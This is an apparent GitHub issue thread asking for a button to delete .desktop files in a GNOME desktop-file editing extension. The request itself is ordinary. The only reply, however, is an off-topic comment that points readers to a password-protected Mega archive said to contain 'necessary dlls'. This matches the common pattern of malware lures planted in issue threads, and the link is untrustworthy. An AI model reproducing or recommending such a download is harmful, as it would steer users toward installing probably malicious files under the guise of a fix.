### ISSUE TITLE
Add button to delete the backing `.desktop` file

### ISSUE THREAD

**Issue by Dannflower** [Dannflower/edit-desktop-files#4]
Sometimes applications don't properly cleanup their .desktop entries or you've had to rename them to get their windows to sync with the correct icon in the App Grid/Dock. It'd be nice to be able to delete `.destkop` files directly from the UI.

Ideally this extension should able to:
- Allow the user to click a button to delete the `.desktop` file backing an app icon in the App Grid.

**Comment by SagarChandra07** [comment]
This might help:This file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive password: changeme
I put the necessary dlls in the archive
